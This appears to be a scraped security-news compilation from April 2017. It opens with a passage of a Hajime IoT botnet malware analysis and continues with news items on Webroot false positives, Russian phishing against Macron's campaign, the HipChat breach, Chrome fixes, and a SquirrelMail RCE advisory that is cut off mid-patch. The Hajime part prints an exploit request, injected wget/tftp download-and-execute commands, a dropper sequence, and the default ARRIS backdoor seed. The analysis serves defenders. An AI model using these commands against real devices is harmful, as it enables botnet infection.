Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
After some checks, it sends the following request to trigger the vulnerability:
POST /UD/act?1 HTTP/1.1
Host: VICTIM_HOST:VICTIM_PORT
User-Agent: RANDOM_USER_AGENT
Content-Type: text/xml
Content-Length: BODY_LENGTH
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
<?xml version=”1.0″?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” SOAP-ENV:encodinghttp://schemas.xmlsoap.org/soap/encoding//”>http://schemas.xmlsoap.org/soap/encoding/“>
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u=”urn:dslforum-org:service:Time:1″>
<NewNTPServer1>INJECT_COMMANDS</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
The INJECT_COMMANDS can either be:
cd /tmp;tftp -l<INT_ARCH_ID> -r<INT_ARCH_ID> -g <SEED_IP_PORT>;chmod 777 <INT_ARCH_ID>;./<INT_ARCH_ID>
or:
cd /tmp;wget http://<SEED_IP_PORT>/<INT_ARCH_ID>;chmod 777 <INT_ARCH_ID>;./<INT_ARCH_ID>
Once the vulnerable device executes the commands specified in INJECT_COMMANDS, the device is infected and becomes part of the botnet.
Architecture detection
With the addition of the new attack vector as described above, it would make sense to improve the architecture detection logic. This is because Hajime doesn’t attack any specific type of device, but rather any device on the Internet with the exception of several networks (it does has some logic to speed up attacks on specific devices though – see the next section). And this is exactly what they did, though strangely enough this only holds for the Telnet attack.
Once the attack successfully passes the authentication stage, the first 52 bytes of the victim’s echo binary are read. The first 20 bytes, which is the ELF header, hold information about the architecture, operating system and other fields. The victim’s echo ELF header is then compared against a predefined array, containing the Hajime stub downloader binaries for different architectures. This way the correct Hajime-downloader binary that works on the victim’s machine, can be uploaded from the attacker (which is actually the infected device that started the attack).
But before this, the host and port that the malware will be downloaded from needs to be set. The Hajime stub downloader binary has these values filled up with 0xCC bytes by default. To solve this, they are fixed on the fly right before connecting.
Furthermore the downloader needs to be patched with the WAN interface’s name. The attackers have a clever trick, where they ‘echo’ the binary to a file (“.s”), set the WAN interface name and then echo the last part of the binary (see below).
echo -ne “DOWNLOADER_HEX_BYTES” >> .s
(route -n | grep UG | grep lbr0 && echo -n lbr0 >> .s) || (route -n | grep UG | grep mta0 && echo -n mta0 >> .s)
echo -ne “DOWNLOADER_HEX_BYTES” >> .s
./.s>.i; chmod +x .i; ./.i; rm .s;
exit
“Smart” password bruteforcing
Even though Hajime can attack any device, the authors nevertheless focused on some specific brands/devices. For example, if after opening a telnet session the welcome message contains one of the following words, then the bruteforcing starts with a specific username-password combination.
Password hint words:
(none)
host
Welcome to ATP Cli
STAR-NET ADSL2+ Router
Mdm9625
BCM
MikroTik
SMC
P-2612HNU
ipc
dvrdvs
F660
F609
One string that is not listed above is that of “ARRIS”, because if this string is found, the attack changes slightly. The Atk module uses a specially crafted password of the day for the Arris cable modem instead of using the static telnet passwords. The ARRIS password of the day is a remote backdoor known since 2009. It uses a DES encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily password. The default seed is “MPSJKMDHAI” and many ISPs don’t bother changing it at all. After successful authentication the module gains access to a remote shell and can execute commands.
Victimology
While working on this blogpost, we collected statistics using three different methods:
We had a honeypot with telnet open;
We looked at the infected peers as DHT seeders;
We looked at the infected peers as DHT leechers;
Of these three methods, the DHT leecher count proved to be the best. By announcing on the DHT network with a peer id similar to that day’s identifier of the configuration file we were able to be the “nearest” node and collected requests from almost every infected device.
The DHT seeder count is an inverse method; we were requesting the Hajime config and receiving the lists of seeding nodes. Due to the limitations of the DHT architecture we can see most of the leechers, but not most of the seeders. Therefore, the seeder data is of less relevance than the leecher data.
Geography of telnet attackers
Our honeypot registered 2,593 successful telnet Hajime attacks in 24 hours. 2,540 of them were from unique IP addresses, 949 hosts provided a payload and 528 had an active web server running at port 80/tcp.
Distribution of attackers by country
Vietnam 509 20.04%
Taiwan 327 12.87%
Brazil 227 8.94%
Turkey 167 6.57%
Korea 150 5.91%
India 141 5.55%
China 97 3.82%
Russia 72 2.83%
Romania 69 2.72%
Colombia 58 2.28%
Mexico 54 2.13%
Others 669 26.34%
Total 2540
Victim device web server analysis
The HTTP server version is typically shown in the HTTP server response headers. After a little analysis we see that most of the victims turn out to be DVRs, followed by web cameras, routers, etc.
http header “Server” statistics
364 Server: uc-httpd 1.0.0
43 Server: WCY_WEBServer/2.0
9 Server: Boa/0.94.14rc21
4 Server: thttpd/2.25b-lxc 29dec2003
3 Server: Router Webserver
2 Server: GoAhead-Webs
2 Server: JAWS/1.0 May 26 2014
2 Server: nginx/1.4.4
1 Server: DNVRS-Webs
1 Server: IPCamera-Webs
1 Server: IPCamera-Webs/2.5.0
1 Server: JAWS/1.0 Aug 21 2013
1 Server: JAWS/1.0 Jul 9 2013
1 Server: JAWS/1.0 Jun 13 2013
1 Server: JAWS/1.0 Jun 25 2013
1 Server: JAWS/1.0 Mar 20 2014
1 Server: JAWS/1.0 May 13 2013
1 Server: Microsoft-IIS/7.5
1 Server: Web server
1 Server: WebServer
Web interface “title” statistics
315 NETSurveillance WEB
84 WEB SERVICE
37 NETSuveillance WEB
36 IVSWeb 2.0 – Welcome
21
9 main page
6 NEUTRON
4 WEB SURVEILLANCE
3 CPPLUS DVR –Web View
2 IVSWeb 2.0 – Добро пожаловать
2 IVSWEB_TITLE – IVSWEB_LOGIN_TITLE
2 replace
1 CPPLUS DVR–Web View
1 GIGA Security
1 IIS7
1 iProview Web 2.0 – Welcome
1 IVSWeb 2.0 – Hoş geldiniz
1 IVSWeb 2.0 – Witamy
1 WATASHI SERVICE
Geography of infected peers as DHT seeders
Throughout the research period, at least 15,888 unique infected boxes were revealed, though this number is not very accurate. All of them were seeding Hajime config.
Distribution of infected boxes by country
Iran 2285 14.38%
Vietnam 1819 11.45%
Brazil 1102 6.94%
Turkey 911 5.73%
China 909 5.72%
Taiwan 805 5.07%
Russia 747 4.70%
India 642 4.04%
Korea 624 3.93%
Mexico 542 3.41%
Others 5502 34.63%
Total 15888
Geoip of infected peers as DHT leechers
This method revealed 297,499 unique infected hosts during the research period. All of them were requesting Hajime config.
Distribution of leechers by country
Iran 58465 19.65%
Brazil 26188 8.80%
Vietnam 23418 7.87%
Russia 22268 7.49%
Turkey 18312 6.16%
India 16445 5.53%
Pakistan 14069 4.73%
Italy 10530 3.54%
Taiwan 10486 3.52%
Australia 9436 3.17%
Others 87882 29.54%
Total 297499
Conclusion
The most intriguing thing about Hajime is its purpose. While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity. And maybe this will never happen, because every time a new configuration file is downloaded, a piece of text is displayed through stdout while the new configuration is being processed:
Example message:
Whether the author’s message is true or not remains to be seen. Nevertheless, we advise owners of IoT devices to change the password of their devices to one that’s difficult to brute force and to update the firmware if possible.
Kaspersky Labs products detect this threat as Backdoor.Linux.Hajime.
Appendix
Hardcoded IP subnetworks avoided by Hajime:
85.159.0.0/16 Ukraine; Region Vinnyts’ka Oblast’
109.201.0.0/16 Iran, Islamic Republic of; Region Tehran
77.247.0.0/16 Germany Virtela Communications Inc Amsterdam, NL POP
169.255.0.0/16 South Africa; Region Gauteng
0.0.0.0/8 IANA – Local Identification
3.0.0.0/8 General Electric Company
15.0.0.0/8 Hewlett-Packard Company
16.0.0.0/8 Hewlett-Packard Company
56.0.0.0/8 US Postal Service
224.0.0.0/4 Multicast
United States Department of Defense:
6.0.0.0/8
7.0.0.0/8
11.0.0.0/8
21.0.0.0/8
22.0.0.0/8
26.0.0.0/8
28.0.0.0/8
29.0.0.0/8
30.0.0.0/8
33.0.0.0/8
55.0.0.0/8
214.0.0.0/8
215.0.0.0/8
Private networks:
192.168.0.0/16
172.16.0.0/12
127.0.0.0/8
10.0.0.0/8
100.64.0.0/10
198.18.0.0/15
Webroot 'mistakenly' flags Windows as Malware and Facebook as Phishing site
25.4.2017 thehackernews Vulnerebility
Popular antivirus service Webroot mistakenly flagged core Windows system files as malicious and even started temporarily removing some of the legit files, trashing user computers around the world.
The havoc caused after the company released a bad update on April 24, which was pulled after approximately 15 minutes. But that still hasn't stopped some PCs from receiving it, causing serious issues for not just individuals, but also companies and organizations relying on the software.
Webroot even Blocked Facebook
According to the reports by many customers on social media and Webroot's forum, hundreds and even thousands of systems were broken down after antivirus software flagged hundreds of benign files needed to run Windows and apps that run on top of the operating system.
The faulty update even caused the antivirus to incorrectly block access to Facebook after flagging the social network service as a phishing website, preventing users from accessing the social network.
"Webroot has not been breached and customers are not at risk," the company said on its online forum. "Legitimate malicious files are being identified and blocked as normal."
What all went Wrong?
The buggy update caused Webroot anti-virus service to detect legitimate Windows files, including those signed by Microsoft, as W32.Trojan.Gen files – generic malware, in other words.
This behavior, eventually, moved critical Windows system files essential to the operating system's effective functioning into quarantine, making them unavailable to Windows and rendering hundreds of thousands of computers unstable.
Even files associated with some of the applications had also been flagged as malicious and quarantined.
Webroot is Working on a Universal Fix
Webroot, which claims to have over 30 million customers last year, has suggested fixes for those using the Home edition and Business edition of its anti-virus software.
The company's technical team also moved quickly and pushed a fix for the Facebook issue last night, according to the post on the company's forum.
However, the company has yet to provide a definitive fix for its entire affected user base. The company confirms that it's "currently working on this universal solution now," but did not say when it would arrive.
What Affected Users should do
Meanwhile, the company has provided workarounds to restore files and prevent its antivirus from re-detecting the same Windows files as W32.Trojan.Gen, though it is only useful for home edition users and not for managed services providers (MSPs).
However, one user on Webroot's forum is reporting that uninstalling Webroot, then restoring quarantined files from a backup drive, and then re-installing Webroot believes in fixing the issue.
French Presidential Candidate Targeted by Russia-Linked Hackers
25.4.2017 securityweek CyberSpy
A notorious cyber espionage group linked to the Russian government has targeted the political party of French presidential candidate Emmanuel Macron, according to a report published on Tuesday by Trend Micro.
The news comes shortly after Macron won the first round of France’s presidential election. Many believe he will become the county’s next president after he was endorsed by several top politicians, including former opponents in the presidential race.
Trend Micro’s report describes the activities of the threat actor known as Pawn Storm, APT28, Fancy Bear, Sofacy, Sednit and Strontium. Researchers have identified tens of military, government, defense, media, political, religious, educational and international organizations targeted by the group.
An analysis of the phishing domains used by the hackers suggests that one of the targets was Macron’s campaign. The attackers registered the domain onedrive-en-marche.fr, which is similar to en-marche.fr, the official website of Marcon’s En Marche! party, likely in an effort to get users to hand over their credentials.
Macron’s campaign has confirmed for The Wall Street Journal that staffers received phishing emails, but claimed the hacking attempts had failed. The National Cybersecurity Agency of France (ANSSI) also confirmed the attacks, but refused to comment on their origin, Reuters reported.
A representative of En Marche! has accused Russia of interfering with the elections in an effort to help pro-Moscow candidates, but Russia has denied any involvement in the hacker attacks.
According to Trend Micro, the En Marche phishing site was set up in mid-March. The security firm also discovered a phishing domain apparently set up to target the Konrad-Adenauer-Stiftung (KAS) political foundation in Germany. The KAS phishing site, named kassap.de, was created in early April.
Last year, Trend Micro also reported seeing a Pawn Storm attack aimed at Germany’s Christian Democratic Union, the political party of Chancellor Angela Merkel.
Pawn Storm’s political operations have made a lot of headlines, particularly after the group targeted organizations affiliated with the Democratic Party in the United States. The U.S. officially accused Russia of launching the cyberattacks, and authorities confirmed recently that an investigation is underway to determine if the attacks had an impact on this year’s presidential elections.
Trend Micro pointed out in its report that Pawn Storm has often relied on so-called false flag operations. Individuals and groups claiming to be hacktivists have taken credit for several of the attacks attributed to Pawn Storm.
For instance, an individual using the online moniker Guccifer 2.0 has taken credit for the Democratic Party attacks, and a group calling itself Fancy Bears claimed to have been behind the attack on the World Anti-Doping Agency (WADA). Several other “hacktivist” groups have been connected to Pawn Storm, including Cyber Caliphate, which claimed to be linked to ISIS when it attacked the U.S. Army and French TV station TV5Monde back in 2015.
Atlassian's HipChat hacked, user data and private messages compromised
25.4.2017 thehackernews Hacking
Atlassian's group chat platform HipChat is notifying its users of a data breach after some unknown hacker or group of hackers broke into one of its servers over the weekend and stole a significant amount of data, including group chat logs.
What Happened?
According to a security notice published on the company's website today, a vulnerability in a "popular third-party" software library used by its HipChat.com service allowed hackers to break into its server and access customer account information.
However, HipChat did not say exactly which programming blunder the hackers exploited to get into the HipChat cloud server.
What type of Information?
Data accessed by the hackers include user account information such as customers' names, email addresses and hashed password information.
Besides information, attackers may have obtained metadata from HipChat "rooms" or groups, including room name and room topic. While metadata is not as critical as direct messages, it's still enough to identify information that's not intended to be public.
Worse yet, the hackers may also have stolen messages and content in chat rooms, but in a small number of instances (about 0.05%). There has been no sign that over 99% of users' messages or room content was compromised.
Fortunately, there's no evidence that the attackers have accessed anyone's credit card or financial information.
Who are not affected?
HipChat users not connected to the affected third-party software library are not affected by the data breach.
Other Atlassian properties also are safe, as the company claimed that there is no evidence to suspect that other Atlassian systems or products like Jira, Confluence, or Trello have been affected by the hack.
To Worry or Not to Worry?
There's no need to panic, as the passwords that may have been exposed in the breach would also be difficult to crack.
Atlassian Chief Security Officer Ganesh Krishnan noted that HipChat hashes all passwords using the bcrypt cryptographic algorithm, with a random salt.
The data is hashed with bcrypt, which transforms the passwords into a set of random-looking characters, and makes the hashing process so slow that it would literally take centuries to brute-force all of the HipChat account passwords.
For added security, HipChat also "salted" each password with a random value before hashing it, adding additional protection against possible decryption.
However, data breaches like this are made worse by the fact that there have been so many breaches prior to it, and secondly, that majority of users make use of the same or similar passwords for their multiple accounts.
So, it doesn't take much for hackers to cross reference a user's username or email address in a database from a previous breach and find an old password, placing users at greater risk of a hack.
How Many victims?
HipChat did not say how many users may have been affected by the incident, but the company is taking several proactive steps to secure its users.
What is HipChat doing?
As a precaution, HipChat has invalidated passwords on all potentially affected HipChat-connected accounts, and emailed password reset instructions, forcing every user to reset their account password.
The company is also attempting to track down and fix the security vulnerability in the third-party library used by its service that allowed for the breach.
In response to the attack, the company is also updating its HipChat Server that will be shared with its customers directly through the standard update channel.
HipChat has also isolated the affected systems and closed any unauthorized access.
HipChat parent company Atlassian is also actively working with law enforcement on the investigation of this matter.
What Should You Do Now?
For the Obvious reasons, all HipChat customers are highly recommended to change their passwords as soon as possible.
You should also particularly be alert of the Phishing emails, which are usually the next step of cyber criminals after a breach. Phishing is designed to trick users into giving up further details like passwords and bank information.
Webroot started tagging Windows files, Facebook as malicious after a faulty update
25.4.2017 Securityaffairs Vulnerebility
Webroot home and business products are tagging Windows files and Facebook as malicious after a recent faulty update. Users are going crazy.
The Webroot home and business defense solutions started tagging legitimate Windows and Facebook as malicious after a recent update.
Many organizations claimed hundreds and even thousands of malfunctions to their endpoints, the glitch caused the Webroot product to detect legitimate Windows files, including digitally signed ones, as W32.Trojan.Gen.
Many customers started reporting the embarrassing problem to online, they reported the issue through social media and Webroot’s forum complain serious problems for their businesses.
Files tagged as malicious by Webroot had been quarantined with important problems for the end-users.
Follow
Limbaughnomicon @Limbaughnomicon
@Webroot @WebrootSupport This false positive issue is driving me insane. As an MSP, a true nightmare. No quarantine restores work. HELP!
3:25 AM - 25 Apr 2017
Retweets likes
Follow
Bob Ripley @M5_Driver
@Webroot I seem to have installed a nasty Ransomware app. It's called Webroot. They already have my money, should I contact the FBI?
12:13 AM - 25 Apr 2017
Retweets 7 7 likes
The update is also blocking the Webroot security product to block access to Facebook as reported by many users on Twitter, the antivirus flagged the popular social network as a phishing website.
Keith Sieman @KeithSieman
> Tfw @Webroot gives you a link to their @facebook page on the very same screen that's blocking access to Facebook... 🙃
3:13 AM - 25 Apr 2017
Retweets likes
The company has published an official statement to calm down its customers, it explained that the system of the company wasn’t under attack.
“We are still working to resolve this issue through the night and will keep you updated as soon as more information becomes available.” read the message shared by Webroot on its forum.
“Webroot has not been breached and customers are not at risk. Legitimate malicious files are being identified and blocked as normal. We continue to work on a comprehensive resolution, but a live fix has been released for the Facebook issue and is propagating through to customers now.”
Webroot has provided a workaround solution for small business customers, unfortunately, managed services providers (MSPs) have to wait to fix the problem.
The company also provided a fix for the Facebook problem.
“We understand that this is a consumer and business issue. For our small business customers, the fix below will work.
We understand that MSPs will require a different solution. We are currently working on this universal solution now.” continues the company.
Experts highlighted that this is the second incident involving Webroot products this year, a faulty update issued in February caused many systems to crash.
Are you thinking to change product?
Probably you need to know that similar problems affected products of other IT security giants such as Norton and ESET.
Webový prohlížeč Chrome obsahuje nebezpečné trhliny
25.4.2017 Novinky/Bezpečnost Zranitelnosti
Na pozoru by se měli mít uživatelé, kteří používají webový prohlížeč Chrome. Obsahuje totiž nebezpečné trhliny, které mohou zneužít počítačoví piráti. Nová verze browseru naštěstí všechny objevené chyby opravuje.
V Chromu bylo před vydáním nové verze objeveno celkem 29 bezpečnostních trhlin. Z toho tři byly označeny jako „vysoce závažné“. Tyto chyby tedy mohou kyberzločinci zneužít k tomu, aby do počítače propašovali prakticky libovolný škodlivý kód. Stejně ale mohou přistupovat k nastavení napadeného stroje či uloženým datům na pevném disku.
Teoreticky počítačoví piráti mohou zneužít také osm chyb, které mají nálepku „důležité“. U nich se nicméně nepředpokládá, že by v praxi došlo k jejich masivnímu zneužívání, jako je tomu u vysoce závažných bezpečnostních nedostatků.
S instalací neotálet
Zbylé aktualizace pak slouží především ke zlepšení funkčnosti jednotlivých součástí internetového prohlížeče. Tyto důležité záplaty by tedy neměly pro uživatele představovat žádné velké bezpečnostní riziko.
S instalací aktualizace Chromu by s ohledem na možná rizika neměli uživatelé otálet. Stahovat opravy je možné prostřednictvím automatických aktualizací.
Nainstalovat aktualizaci manuálně je možné prostřednictvím nápovědy, konkrétně v části „O aplikaci Chrome“. Po rozkliknutí této nabídky se uživateli automaticky nabídne instalace nejnovější verze.
Lovci chyb si vydělali statisíce
Není bez zajímavosti, že většinu trhlin odhalili tzv. lovci chyb. Tedy hackeři, kteří jsou odměňováni za nalezené trhliny. Tvůrci Chromu jim za to vyplatili 14 000 dolarů, tedy v přepočtu bezmála 350 000 korun.
Největší odměnu získali počítačoví experti, kteří objevili trhlinu týkající se knihovny PDFium. Právě tato chyba je označena jako „vysoce závažná“. Za jedinou chybu získali lovci 3000 dolarů, tedy více než 74 000 korun.
Podobným způsobem začala hackery na nalezení chyb loni lákat také společnost Apple.
Macronovi chtěli ukrást hesla hackeři napojení na Rusko, potvrdila japonská firma
25.4.2017 ČT24 BigBrother
Šéf digitální sekce Macronovy kampaně potvrdil, že štáb vítěze prvního kola francouzských prezidentských voleb byl vystaven útokům hackerů napojených na Rusko. Elektronickou špionáž odhalila japonská protivirová společnost Trend Micro. Všechna napadení se ale údajně podařilo odvrátit. Moskva obvinění odmítá.
Francii čeká ve 2. kole duel bořičů tradičního systému zavedených politických stran
Za útoky měla stát skupina Pawn Storm (Útok pěšcem), kterou podle amerických zpravodajských služeb řídí ruská špionáž. Útoky byly zaznamenány už loni v prosinci, v té době ovšem neměl Macronův štáb o jejich původu žádné důkazy.
Nezávislá zpráva Trend Micro nyní vypočítává 160 pokusů o elektronickou špionáž proti různým cílům. Hackeři se například pokoušeli získat hesla k účtům členů Macronova volebního štábu.
Macron vzešel z vlády, která na Moskvu kvůli Ukrajině uvalila sankce a odmítla jí dodat už zaplacené vojenské lodě. Politik také ze všech kandidátů nejhlasitěji hájí Unii.
Reformista Macron cílí na umírněné a progresivní voliče. Francii chce "posunout dopředu"
Francouzští experti pečlivě sledovali jakékoli známky kybernetických útoků na první volební kolo. Už v lednu francouzský ministr obrany Le Drian varoval, že počet kybernetických útoků cílených na Francii v uplynulých třech letech dramaticky vzrostl.
Mnozí se obávali, aby se neopakoval americký scénář. Tajné služby v USA už dříve oznámily, že kampaň, která měla ovlivnit loňské prezidentské volby, nařídil přímo ruský prezident Vladimir Putin. Jejím cílem bylo podkopat demokratický proces v zemi a pošpinit demokratickou kandidátku na prezidenta Hillary Clintonovou. Moskva to odmítá a mluví o „absurdních obviněních bez důkazů“.
Tajné služby: Kampaň, která měla ovlivnit prezidentské volby v USA, nařídil Putin
Francouzský ministr zahraničí Jean-Marc Ayrault varoval, že v případě nějakého zásahu do voleb ze zahraničí může přijít odveta. „Nebudeme akceptovat žádné zásahy do našeho volebního procesu, a to ani ze strany Ruska, ani z jakéhokoli jiného státu,“ zdůraznil šéf diplomacie v polovině února.
Také v případě Francie ale Rusko popírá, že by s hackery mělo něco společného. „Je vyloučeno, že by Moskva hrála roli v těchto útocích, ať už k nim došlo, nebo ne. A jakákoli obvinění, že Moskva v tom nějakou roli sehrála, jsou absurdní,“ prohlásil mluvčí Kremlu Dmitrij Peskov.
Obavy přetrvávají i před druhým kolem francouzských voleb plánovaným na 7. května, v němž se Macron utká s šéfkou krajní pravice Marine Le Penovou. Ta chválí Putina a nechala se slyšet, že by Francie měla uznat Krym jako součást Ruské federace. Její Národní fronta před lety dostala půjčku devět milionů eur (249 milionů korun) od První česko-ruské banky, což vyvolalo v Evropě pozdvižení.
Detektiv Rafael Rivera odhalil, že systémové soubory obsahují nemálo nepotřebných metadat
25.4.2017 Cnews.cz Bezpečnost
Metadata se na uživatelském zážitku nepodílí a Windows je také nepotřebuje.
Vývojář Rafael Rivera se opět pustil do prozkoumávání Windows – vlastně nikdy nepřestal. Nejdříve si napsal nástroj, jenž vyhledává spouštěcí soubory obsahující metadata, která patří platformě XMP od Adobe. Ta se nachází v obrázcích formátu PNG. Posléze Rivera tímto nástrojem skenoval původní obraz Windows 10, verzi neuvedl, ale zásadní rozdíly očekávat nelze. Kupodivu zjistil, že se metadata nachází v řadě systémových souborů.
Spouštěcí soubory nebo knihovny mohou obsahovat obrázky. Někdy jsou metadata užitečná, např. když je zde uvedena poloha pořízených snímků, díky čemuž pak můžeme fotografie snáze třídit. V případě produktů jako Windows lze ovšem o potřebnosti metadat úspěšně pochybovat.
Naopak tato metadata využívají systémové prostředky a zabírají místo. Metadata tvoří překvapivě velkou část některých souborů. Jedná se o 20 % velikosti souboru explorer.exe, který patří Průzkumníku a jedná se o jednu ze základních komponent. Knihovna ApplicationFrame.dll, jež zodpovídá mj. zobrazování za záhlaví aplikací, je dokonce ze 41 % tvořena nepotřebnými metadaty.
Windows by mohl být ještě lépe optimalizovaný, jak ukázal Rivera (Ilustrační foto)
Tyto příklady naznačují, jakým směrem by se mohly ubírat příští optimalizace Windows. Podle Rivery má Microsoft více možností, jak se nadbytečného obsahu zbavit. Tvrdí, že odebrání nemusí být tak bezvýznamné, jak si možná myslíme. Microsoft se již několik let snaží vymáčknout z Windows co nejlepší výkon – jádro Windows dnes běží i na smartphonech – a optimalizuje, jak může, aby prodloužil výdrž zařízení.
Rivera dále uvádí, že podle manažera dříve pracujícího v týmu kolem Internet Exploreru dnes vývojový tým Edge používá nástroje, které právě zbavují kód nepotřebných částí, tedy i uvedených metadat. Dále obrázky optimalizují pomocí algoritmu ZopFli. I to je důvod, proč je Edge tak rychlý. Odebrat metadata, jež k uživatelskému zážitku nijak nepřispívají, by minimálně nebylo nic proti ničemu.
Hacker Track2 se zapsal do historie. Za útok dostal trest 27 let vězení
25.4.2017 Živě.cz Kriminalita
Ve Spojených státech byl odsouzen na 27 let odnětí svobody ruský hacker Roman Selezňov, který napadl platební terminály ve velkých finančních institucích i v malých prodejnách. Při útocích odcizil údaje z platebních karet a jiná citlivé data. Způsobil tak škody v celkové výši 169 milionů dolarů (155,78 milionů eur), informuje Ars Technica.
Známý hacker iPhonů a PlayStationu si objednal Teslu. Od výrobce dostal varování
Útočník, vystupující pod přezdívkou „Track2“, byl zatčen už v roce 2014 na Maledivách. V té chvíli měl u sebe notebook, ve kterém se nacházela čísla 1,7 milionu kreditních karet.
Po soudním procesu byl Rus v srpnu 2016 obviněn z 38 případů porušení zákona, mimo jiné z podvodu prostřednictvím elektronických médií, z úmyslného poškození chráněného počítače a ze závažného zločinu krádeže identity.
Státní žalobkyně: Zaslouží si tvrdý trest
Americká vláda žádala pro Selezňova 30 let vězení. Státní žalobkyně Annette Hayesová uvedla, že ruský hacker si zaslouží tvrdý trest, protože je průkopníkem, který pomohl rozjet obchod s údaji z kradených kreditních karet. Jak dodala, Selezňov se stal jednou z nejváženějších osobností zločineckého podsvětí.
Soud s 32letým zločincem se konal v Seattlu, kde v minulosti úspěšně zaútočil na několik obchodů. Patřila k nim i restaurace Broadway Grill. Její představitelé se vyjádřili, že hackerský útok byl jedním z důvodů, proč museli provoz v roce 2013 zavřít.
Vyrobili jsme si rušičku Wi-Fi. Stačil běžný laptop a hackerský Kali Linux
Případ upoutal pozornost světových médií. Otcem odsouzeného Romana Selezňova je totiž poslanec ruské Státní dumy Valerij Selezňov, který je považován za blízkého politického spojence prezidenta Putina. Valerij Selezňov označil vydání svého syna do USA za únos. Americká strana totiž využila toho, že hacker odcestoval z Ruska na dovolenou na Maledivy – dohodla se s tamními úřady, a ty zasáhly. Díky tomu se pak dostal do USA a před soud.
Selezňov: Měl jsem těžké dětství
Útočník na svou obhajobu vlastnoručně napsal 11stránkový dopis, který adresoval federálnímu soudu. Popsal v něm složité podmínky, ve kterých vyrůstal ve městě Vladivostok. Podle vlastních slov se ve věku sedmnácti let stal svědkem úmrtí své matky, která se otrávila alkoholem.
Zmínil i teroristický útok v Maroku v roce 2011, při kterém se vážně zranil a má trvalé následky. Zdlouhavá rekonvalescence si údajně vybrala daň i v jeho soukromí, když se s ním rozvedla manželka. Selezňov na závěr listu vyjádřil vůli odčinit v co největší možné míře škody, které napáchal.
Stačí telefonní číslo a hacker vás bude odposlouchávat lépe než NSA
Trest 27 let odnětí svobody je vůbec nejdelším, který byl v historii USA udělen v souvislosti s hackerským útokem. Ruská strana jej považuje za nepřiměřený a z její strany zaznívají názory, že se jedná o politickou provokaci USA. Odsouzenému nyní běží lhůta pro možnost odvolání k vyšší instanci, zatím tak neučinil.
Webroot Tags Windows Files, Facebook as Malicious
25.4.2017 securityweek Vulnerebility
An update released by Webroot has caused the company’s home and business products to flag legitimate files and websites as malicious.
While the faulty update was only available for less than 15 minutes on Monday, many customers took to social media and Webroot’s forum to complain that it had caused serious problems for their organization. Users reported that hundreds and even thousands of their endpoints were affected.
The update caused Webroot to detect legitimate Windows files, including files signed by Microsoft, as W32.Trojan.Gen. Users also reported that files associated with some of their applications had been flagged as malicious and quarantined.
Follow
Limbaughnomicon @Limbaughnomicon
@Webroot @WebrootSupport This false positive issue is driving me insane. As an MSP, a true nightmare. No quarantine restores work. HELP!
3:25 AM - 25 Apr 2017
Retweets likes
The update also caused the antivirus to block access to Facebook after flagging the service as a phishing website.
“Webroot has not been breached and customers are not at risk. Legitimate malicious files are being identified and blocked as normal,” Webroot said on its forum.
The company has provided a workaround for small business customers, but there is still no solution for managed services providers (MSPs). A fix has also been pushed out for the Facebook issue.
“We understand that MSPs will require a different solution,” Webroot said. “We are currently working on this universal solution now.”
This is the second buggy update released by Webroot this year. An update rolled out in February caused many systems to crash.
Webroot is not the only security firm whose products have caused problems for users. Buggy updates were also released in the past by ESET, Panda Security, Norton and other antivirus vendors.
Squirrelmail 1.4.22 is affected by a Remote Code Execution flaw, no fix is available
25.4.2017 securityaffairs Vulnerebility
The popular PHP webmail package SquirrelMail is affected by a remote code execution vulnerability tracked as CVE-2017-7692.
The popular PHP webmail package SquirrelMail is affected by a remote code execution vulnerability tracked as CVE-2017-7692, that could be exploited by hackers to execute arbitrary commands on the target and fully control it.
The recent version, 1.4.22, and prior versions of the package could be affected by the vulnerability.
The issue was discovered by the popular security researcher Dawid Golunski from Legal Hackers, in January the expert reported it to the maintainers of the project.
Follow
Dawid Golunski @dawid_golunski
[Advisory] SquirrelMail <=1.4.22 Auth. Remote Code Exec#exploit #0day #cybersecurity #infosec #vuln #hacking #rcehttps://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html …
8:44 PM - 23 Apr 2017
40 40 Retweets 60 60 likes
You remind Golunski as the expert who discovered other RCE flaws in the email libraries PHPMailer and SwiftMailer.
Despite the maintainers have been informed of the issue, it is still unclear if and when the problem will be solved.
The vulnerability stems from insufficient escaping of user-supplied data when the package is configured with Sendmail as its main transport.
“SquirrelMail is affected by a critical Remote Code Execution vulnerability which stems from insufficient escaping of user-supplied data when SquirrelMail has been configured with Sendmail as the main transport.” wrote Golunski in a security advisory.”An authenticated attacker may be able to exploit the vulnerability to execute arbitrary commands on the target and compromise the remote system.”
Sendmail is a popular mail transfer agent that comes configured as default on email environments.
SquirrelMail configured to use Sendmail fails to take into account a character that can be used by hackers to inject additional parameters.
“SquirrelMail allows authenticated users to control envelopefrom (Return-Path) address through the webmail web interface.” continues Golunski.
“As we can see it calls str_replace() to sanitize the user input to prevent injection of additional parameters to the sendmail command.
Unfortunately it does not take into account \t (TAB) character which can be used by attackers to inject additional parameters.”
The advisory includes the proof of concept code to inject specific parameters to a malicious Sendmail config file, which can then be uploaded as an attachment to trigger the RCE flaw.
The PoC code contains payloads for file write and remote code execution,
Golunski decided to publish release the PoC code after that Filippo Cavallarin, CEO at security firm Segment, disclosed the same vulnerability via the Full Disclosure mailing list archives.
Cavallarin also shared the following unofficial patch for the above issue:
BOF
diff -ruN squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php
squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php
--- squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php 2011-01-06 02:44:03.000000000 +0000
+++ squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php 2017-04-18
11:42:26.505181944 +0000
@@ -93,9 +93,9 @@
$envelopefrom = trim($from->mailbox.'@'.$from->host);
